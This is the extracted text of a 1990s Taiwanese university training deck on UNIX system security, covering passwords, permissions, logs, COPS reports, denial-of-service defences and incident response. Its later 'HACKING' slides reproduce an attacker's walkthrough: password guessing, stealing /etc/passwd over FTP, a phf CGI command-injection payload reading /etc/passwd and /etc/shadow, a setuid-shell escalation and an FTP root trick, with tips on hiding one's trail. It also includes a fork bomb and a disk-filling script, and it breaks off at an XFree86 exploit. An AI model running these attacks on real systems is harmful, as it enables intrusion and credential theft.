云嘉区网中心研习课程.ppt

1,雲 嘉 區 網 中 心 研 習 課 程,系統安全管理,國立中正大學電算中心,張永榴,changccunix.ccu.edu.tw,2,系統安全管理,雲嘉區網中心研習課程,PART I. UNIX Security Basics PART II. Enforcing Security on your System PART III. Handling Security Incidents,3,系統安全管理,雲嘉區網中心研習課程,PART I. UNIX Security Basics 1. Introduction 2. Users and Passwords 3. The UNIX Filesystem,4,系統安全管理,雲嘉區網中心研習課程,A computer is secure if you can depend on it and its software to behave as you expect it to.,The three parts of UNIX: The kernel Standard utility programs System database files,Introduction,5,系統安全管理,雲嘉區網中心研習課程,Prevention： 1. Backup 2. Monitoring system log files and running processes. 3. upgrade OS patches 4. Dont install illegal packages. 5. Read news about security,6,系統安全管理,雲嘉區網中心研習課程,Users and Passwords:,The crypt Algorithm Password Salt Encrypted Password - - - nutmeg Mi MiqkFWCm1fNJI ellen1 ri ri79KNd7V6.Sk Sharon ./ ./2aN7ysff3qM norahs am amfIADT2iqjAf norahs 7a 7azfT5tIdyh0I,/etc/passwd files root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh daemon:*:1:1:/tmp uucp:ooRoMN9FyZNE:4:4:/usr/spool/uucpublic:/usr/lib/uucp/uucico rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/csh arlin:f8fk3jlOrf34:182:100:Arlin Steinberg:/u/arlin:/bin/csh,7,系統安全管理,雲嘉區網中心研習課程,Bad Passwords: login name, anybodys name, birth date phone number, a place, all the same letter, word in the English dictionary, all numbers, less than 6 letters, Adminstrative Techniques assign passwords to users crack your own passwords shadow password files password aging and expiration Summary ensure every account has a password ensure every user choose a strong password use shadow password file, if available,8,系統安全管理,雲嘉區網中心研習課程,The UNIX Filesystem File permissions read, write, execute The umask command SUID, SGID % ls -l /bin/su -rwsr-sr-x 1 root 16384 Sep 3 1989 /bin/su % find / - perm 4000 -print,9,系統安全管理,雲嘉區網中心研習課程,1. Defending Your Accounts 2. Securing Your Data 3. The UNIX Log Files 4. Modems 5. Networks and Security 6. NFS 7. COPS 8. Patch Installation 9. Firewall,Part II. Enforcing Security on Your System,10,系統安全管理,雲嘉區網中心研習課程,Defending Your Accounts, Dangerous Accounts accounts without passwords defaults accounts accounts that run a single command open accounts Protecting the root Accounts secure terminals the wheel group,11,系統安全管理,雲嘉區網中心研習課程,Securing Your Data File backups 1. Why back up? user error, system staff error, hardware error, software error, electronic break-ins, natural disaster 2. What should you back up? user files, system databases, any system directories 3. How long back up? Database daily checking /etc/passwd, /etc/group, /etc/rc*, /etc/ttys, /etc/inittab, /usr/spool/cron/crontabs, /etc/aliases, /etc/exports, /etc/vfstab, /etc/netgroup,12,系統安全管理,雲嘉區網中心研習課程,The UNIX Log Files /usr/adm/lastlog /etc/utmp, /usr/adm/wtmp, /usr/adm/wtmpx /usr/adm/pacct /usr/adm/sulog,13,系統安全管理,雲嘉區網中心研習課程,Modems 1. Devices: /dev/modem, /dev/ttys(0-9), /dev/ttyfa, /dev/ttyda, /dev/cua* 2. Mode and owner: chmod 600 /dev/modem chown root /dev/modem 3. Modems hang-up checking:,14,系統安全管理,雲嘉區網中心研習課程,Networks and Security,Trusted ports 01023 /etc/services file Rlogin and rsh /etc/hosts.equiv /.rhosts “r” commands in /etc/inetd.conf file /.netrc Remote print /etc/hosts.lpq,15,系統安全管理,雲嘉區網中心研習課程,Networks and Security,Restricting FTP /etc/ftpusers Set EEPROM password # eeprom security-mode=full # eeprom security-password= Changing PROM password: New password: Retype password: Cron jobs: /var/spool/cron/crontabs file Set “CRONLOG=yes” in /etc/default/cron,16,系統安全管理,雲嘉區網中心研習課程,Networks and Security, Finger /etc/inetd.conf kill -1 pid_of_inetd Sendmail 1. debug, wiz, kill command 2. delete decode aliases from alias file. (decode:”|/usr/bin/uudecode”) 3. disable the “wizard” password in the sendmail.cf file. Example: #Let the wizard do what she want OWsitrVlWxktZ67,17,系統安全管理,雲嘉區網中心研習課程,Networks and Security, Anonymous FTP 1. create ftp account. 2. mkdir ftp/bin ftp/etc ftp/pub 3. cp /bin/ls ftp/bin 4. chmod 111 ftp/pub /ftp/etc ftp/bin ftp/bin/ls 5. cp /etc/passwd ftp/etc/passwd 6. cp /etc/group ftp/etc/group 7. chmod 444 ftp/etc/* 8. chown root ftp ftp/etc /ftp/bin 9. chown ftp.ftp ftp/pub 10. chmod 555 ftp,18,系統安全管理,雲嘉區網中心研習課程,NFS, NIS 1. /etc/passwd file +:0:0: (wrong) +:*:0:0: (on NIS clients only) 2. Netgroup /etc/netgroup (hostname,username,domainname),19,系統安全管理,雲嘉區網中心研習課程,NFS, /etc/exports File exportfs command showmount command,20,系統安全管理,雲嘉區網中心研習課程,COPS File, directory and device files permissions /etc/passwd and /etc/group files SUID files examples:,21,系統安全管理,雲嘉區網中心研習課程,ATTENTION: Security Report for Wed Dec 18 13:30:30 CST 1991 from host peanut.nuts.com Warning! A “+” entry in /etc/hosts.equiv! Warning! “.” (or current directory) is in roots path! Warning! Directory /usr/spool/mail is _World_writable! Warning! File /etc/motd is _World_writable! Warning! File /etc/mntab is _World_writable! Warning! File /etc/remote is _World_writable! Warning! File /etc/sm is _World_writable! Warning! File /etc/sm.bak is _World_writable! Warning! File /etc/state is _World_writable! Warning! File /etc/tmp is _World_writable! Warning! File /etc/utmp is _World_writable! Warning! User uucps home directory /var/spool/uucpublic is mode 03777 Warning! Password file, line 2, negative user id: nobody:*:-2:-2:/: Warning! Password file, line 11, no password: sync:1:1:/:/bin/sync Warning! Password file, line 12, user sysdiag has uid = 0 and is not root sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag: /usr/diag/sysdiag/sysdiag,22,系統安全管理,雲嘉區網中心研習課程,Patch Installation ftp:/sunsite.ccu.edu.tw example:,23,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,一、Destruction Attacks: 1. Reformating a disk partition =Prevent anyone from acessing the machine in single-user mode. Protect the superuser account. 2. Deleting critical files: =Protect system files by specifying approicate modes (eg., 755 or 711). Protect the superuser account. 3. turn off power =Put the computer in a physically location.,24,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,二、Overload Attacks 1.Process Overload Attacks: example. main() while (1) fork(); = Solaris: /etc/system set maxproc=100 2.System Overload: = set your own priority as high as you can with the renice command,25,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,三、Disk Attacks 1. Disk Full Attacks: du command find / -size +1000 -exec ls -l ; quote -f /dev/sd0a set quotas (edquota) reserved space 2. Swap Space Attacks: for Solaris: # mkfile 50m /home # swap -a /home for SUNOS: # mkfile 50m /home # swapon /home,26,系統安全管理,雲嘉區網中心研習課程,Denial of Service Attacks and Solutions,四、Tree Structure Attacks: example: #!/bin/ksh while mkdir_another do cd ./another cp /bin/cc fillitup done = DIY = shell script = delete the inode of the top directory # boot -s # ls -i another # df another # /usr/sbin/clri /dev/dsk/c0t2d0s2 1491 # fsck /dev/dsk/c0t2d0s2,27,系統安全管理,雲嘉區網中心研習課程,PART III. Handling Security Incidents,系統入侵檢測： 1. 檢查連線記錄檔中是否有不尋常的來 源或操作動作。 2. 找出系統中所有setuid及setgid檔案 3. 檢查系統執行檔是否被修改，如login, su, telnet, netstat, ifconfig, ls, find, du, df sync, 任何在/etc/inetd.conf中記載的 程式。 4. 檢查系統中是否有正在執行網路監聽 程式。 5. 檢查所有由cron和at所執行的程式。,28,系統安全管理,雲嘉區網中心研習課程,PART III. Handling Security Incidents,6. 檢查/etc/inetd.conf是否被更改、對應程 式是否正確。 7.檢查/etc/passwd內容及檔案屬性的更動。 8. 檢查系統和網路設定檔。 hosts.equiv, hosts.lpd, .rhosts 9. 找出系統不尋常或隱藏的檔案。 find / -name “ “ -print find / -namee “.*” -print 10. 檢查機器是否被入侵，必須檢查 所有區域網路上機器。,29,系統安全管理,雲嘉區網中心研習課程,PART III. Handling Security Incidents,從log files發現入侵者蹤跡 . 使用者在奇怪的時間內進入 last . 系統不明原因的重新啟動 w, last . 系統時間不明原因改變 time . 來自sendmail, ftp等不尋常的錯誤 訊息 /var/adm/syslog, xferlog . 未經授權或可疑的 su 指令使用 /usr/adm/sulog . 使用者來自陌生站台 who, last,30,系統安全管理,雲嘉區網中心研習課程,PART III. Handling Security Incidents,發現入侵事件 一、確認並瞭解問題 二、阻止損害 三、確定您的診斷並決定損害 四、恢復系統 五、處理根本原因 六、執行相關復原工作,31,系統安全管理,雲嘉區網中心研習課程,HACKING,進入主機有好幾種方式, 可以經由Telnet (Port 23) 或SendMail (Port 25)或FTP或WWW (Port 80) 的方式進入, 一台主機雖然 只有一個位址,但是它可能同時進行多項服務,所以如果你只是 要“進入“該主機, 這些Port都是很好的進行方向.,示範進入主機的方法: (By CoolFire) (首先要先連上某一台你已經有帳號的 Telnet 主機, 當然最好是 假的, 也就是 Crack過的主機, 然後利用它來Crack 別的主機,才 不會被別人以逆流法查出你的所在),Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 (我用的是ms.hinet.net, 當然是假的囉, 都已經經過修改了啦! 沒有這一台主機啦 ! 別怕 ! 別怕!以下的主機名稱都是假的名稱!,32,系統安全管理,雲嘉區網中心研習課程,Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3) (嗯.進來了!開始攻擊吧!本次的目標是),ms.hinet.net telnet www.hackme.hinet.net (Telnet 試試看) Trying 111.222.255.255. Connected to cool.hackme.hinet.net. Escape character is ''. Password: Login incorrect (沒關係, 再來 !) cool login: hinet Password: Login incorrect,(都沒猜對,這邊用的是猜的方法, 今天運氣好像不好),HACKING (Continued),33,系統安全管理,雲嘉區網中心研習課程,(重來, 換個Port試試看!) ms.hinet.net telnet 111.222.255.255 80 Trying 111.222.255.255. Connected to 111.222.255.255. Escape character is ''., Error Error 400 Invalid request “ (unknown method) CERN-HTTPD 3.0A Connection closed by foreign host.,(哇哩!連密碼都沒得輸入,真是.再來!要有恆心!) (換FTP Port試試),HACKING (Continued),34,系統安全管理,雲嘉區網中心研習課程,ms.hinet.net ftp 111.222.255.255 Connected to 111.222.255.255. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (111.222.255.255:FakeName): anonymous 331 Guest login ok, send your complete e-mail address as password. Password:,230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to rootcool.com 230-If you do have problems, please try using a dash (-) as the first character 230-of your password - this will turn off the continuation messages that may 230-be confusing your ftp client. 230-,230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files.,(哇!可以用anonymous進來耶!password部份輸入aaa 就好了,不要留下足跡喔!),HACKING (Continued),35,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),ftp ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. etc pub usr bin lib incoming welcome.msg 226 Transfer complete.,(嗯嗯. 太好了 ! 進來了 ! 下一個目標是.),ftp cd etc 250 CWD command successful. ftp get passwd (抓回來 !) 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (566 bytes). 226 Transfer complete. 566 bytes received in 0.56 seconds (0.93 Kbytes/s),(喔. 這麼容易嗎?),36,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),ftp !cat passwd (看看!) root:0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash ftp:*:404:1:/home/ftp:/bin/bash,(哇哩.是Shadow 的.真是出師不利 ),ftp bye 221 Goodbye.,37,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),(不信邪還是老話, 要有恆心) (FTP 不行, 再Telnet看看!),ms.hinet.net telnet www.hackme.hinet.net Trying 111.222.255.255. Connected to cool.hackme.hinet.net. Escape character is ''. Password: Login incorrect,(又猜錯!),cool login: hackme Password: Last login: Mon Dec 2 09:20:07 from 205.11.122.12 Linux 1.2.13. Some programming languages manage to absorb change but withstand progress. cool:$,(哇哈! 哪個笨root用system name作 username和password! 總算沒白玩!),38,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),抓回來一個“亂七八糟”的/etc/passwd, 你以為我的真那麼笨嗎? guest所抓回來的能是甚麼好東西?所以繼續上次的攻擊行動. 我們已經“猜“到了一個不是guest的username及password. 就以它來進入主機瞧瞧 !,Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3) (嗯. 進來了 ! 開始攻擊吧 ! 本次的目標是.),ms.hinet.net telnet cool.hackme.hinet.net (Telnet 試試看. ) Trying 111.222.255.255. Connected to cool.hackme.hinet.net. Escape character is ''. cool login: hackme Password: (一樣輸入hackme),39,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),Last login: Mon Dec 1 12:44:10 from ms.hinet.net Linux 1.2.13. cool:$ cd /etc cool:/etc$ ls pa* passwd passwd.OLD passwd.old cool:/etc$ more passwd,(看看有沒有Shadow.),root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john : :,(正點!一點都沒有防備!),cool:/etc$ exit logout (走人! 換FTP上場!) Connection closed by foreign host.,40,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),ms.hinet.net ftp www.hackme.hinet.net Connected to cool.hackme.hinet.net. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (www.hackme.hinet.net:66126): hackme 331 Password required for hackme. Password: 230 User hackme logged in. Remote system type is UNIX. Using binary mode to transfer files,ftp cd /etc 250 CWD command successful. ftp get passwd 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (350 bytes). 226 Transfer complete. 350 bytes received in 0.68 seconds (1.9 Kbytes/s),ftp !cat passwd root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john :,(看看! 呵!假不了!),41,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),二、CGI Hole (phf.cgi),http:/www.hackme.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Query Results /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd root:x:0:0:0000-Admin(0000):/:/sbin/sh daemon:x:1:1:0000-admin(0000):/: bin:x:2:2:0000-admin(0000):/usr/bin: sys:x:3:3:0000-admin(0000):/: adm:x:4:4:0000-admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nobody:x:60001:60001:uid no body:/: hansin:x:109:1:/home1/hansin:/usr/lib/rsh dayeh:x:110:1:/home1/dayeh:/usr/lib/rsh,再試http:/www.hackme.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow,42,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),#1 FTP 入侵法? 不太實用的方法!,1 連接到 FTP Server. 2 當系統要求你輸入User Name時Enter不管它 3 Password 輸入 “quote user ftp“ 4 接著再輸入 “quote cwd root“ 5 再輸入 “quote pass ftp“,這種方法似乎只能用在很老舊的FTP Server 上,以國內目 前的機器應該都不會成功的, 如果你想要試試的話, 找找 國外大學的FTP Server試試看吧!依照上面的步驟會產生 甚麼樣的結果? Heehe 你就是root啦!,43,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),#2 Linux 1.2.13漏洞之一?成為root吧!,Linux 1.2.13有許多的漏洞, 如果你所使用的版本是較新 的話,你大可放心,不然你也可以依照下面的方法試試你 的系統!,1 Telnet 到 yournet.net 2 Login之後輸入 “finger yournet.net“ 3 再 “finger rootyournet.net“, 等root來login 4 用WWW Browser連到www.yournet.net 5 Location 輸入 “www.yournet.net/cgi-bin/nph-test-cgi/*“ 6 回到Telnet軟體 “cp /bin/sh /tmp/.sh” 7 再輸入 “chmod 4755 /tmp/.sh“ (You're root now!),44,系統安全管理,雲嘉區網中心研習課程,HACKING (Continued),#3 Xfree86 3.1.2 有個漏洞能讓別人刪除“任何”檔案? 是的! 包括etc/passwd !,- cut here, start code exploit.sh - #!/bin/sh echo Running exploit to check the X